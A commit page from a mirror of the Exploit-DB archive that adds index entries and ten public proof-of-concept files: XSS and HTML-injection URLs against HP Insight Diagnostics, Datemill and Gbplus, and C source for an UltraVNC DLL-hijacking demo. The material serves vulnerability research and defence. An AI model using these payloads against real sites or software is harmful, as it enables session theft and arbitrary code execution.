bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 09_08_2014

Browse source
This commit is contained in:
Offensive Security 2014-09-08 04:43:45 +00:00
parent fe6788f41b
commit 8d2f2b9c4b
11 changed files with 137 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -31107,3 +31107,13 @@ id,file,description,date,author,platform,type,port
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0
34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 DLL Loading Arbitrary Code Execution Vulnerability",2010-08-30,"Ivan Markovic",windows,remote,0
34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 parameters.php device Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 idstatusframe.php Multiple Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 survey.php category Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
34546,platforms/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 globals.php tabpage Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
34547,platforms/php/webapps/34547.txt,"HP Insight Diagnostics Online Edition 8.4 custom.php testmode Parameter XSS",2010-08-31,"Mr Teatime",php,webapps,0
34548,platforms/php/webapps/34548.txt,"Datemill photo_view.php return Parameter XSS",2009-09-10,Moudi,php,webapps,0
34549,platforms/php/webapps/34549.txt,"Datemill photo_search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0
34550,platforms/php/webapps/34550.txt,"Datemill search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0

Can't render this file because it is too large.

10
platforms/php/webapps/34541.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/42842/info
Gbplus is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Inject the following data into the vulnerable fields:
<meta http-equiv="refresh" content="0;url=http://www.example.com/" />

10
platforms/php/webapps/34543.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/42888/info
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
https:///www.example.com/hpdiags/parameters.php?device="</XSS STYLE=xss:expression(location='www.example2.com')>
Versions:- 3.0.0.68, 6.0.0.95 linux, 6.1.0.103 linux

10
platforms/php/webapps/34544.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/42888/info
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
https://www.example.com/hpdiags/idstatusframe.php?pid="%20</XSS STYLE=xss:expression(location='www.example2.com')>
Versions:- 3.0.0.68, 6.0.0.95 linux, 6.1.0.103 linux

11
platforms/php/webapps/34545.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42888/info
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
https://www.example.com/hpdiags/survey.php?category=");//}</XSS/*-*/STYLE=xss:e/**/xpression(location='www.example2.com')>&device=1&filename=Prochec
kup&mount=1&save=1&surveyLevel=1&target=1
Versions:- 3.0.0.68 linux

10
platforms/php/webapps/34546.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/42888/info
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
https://www.example.com/hpdiags/globals.php?tabpage=";alert(1)//
Versions:- 3.0.0.68 linux

10
platforms/php/webapps/34547.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/42888/info
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
HP Insight Diagnostics Online Edition 8.4 and prior are vulnerable.
https://www.example.com/hpdiags/custom.php?testMode=blah';</XSS%20STYLE=xss:expression(location='www.example2.com')>
Versions:- 3.0.0.68 linux

7
platforms/php/webapps/34548.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42896/info
Datemill is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/friendy/photo_view.php?photo_id=13&return="><script>alert(document.cookie);</script>

7
platforms/php/webapps/34549.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42896/info
Datemill is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/friendy/photo_search.php?st="><script>alert(document.cookie);</script>

7
platforms/php/webapps/34550.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42896/info
Datemill is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/friendy/search.php?st="><script>alert(document.cookie);</script>

45
platforms/windows/remote/34542.c Executable file
View file

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/42846/info
UltraVNC is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
UltraVNC 1.0.8.2 is vulnerable; other versions may be affected.
/*
====================================================================
UltraVNC Viewer - Connection 105 DLL Hijacking Exploit (vnclang.dll)
====================================================================
$ Program: UltraVNC Viewer
$ Version: Connection 105
$ Download: http://www.uvnc.com/
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as vnclang.dll
gcc -shared -o vnclang.dll thiscode.c
2> Move DLL file to the directory where UltraVNC is installed
3> Open any file recognized by UltraVNC
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}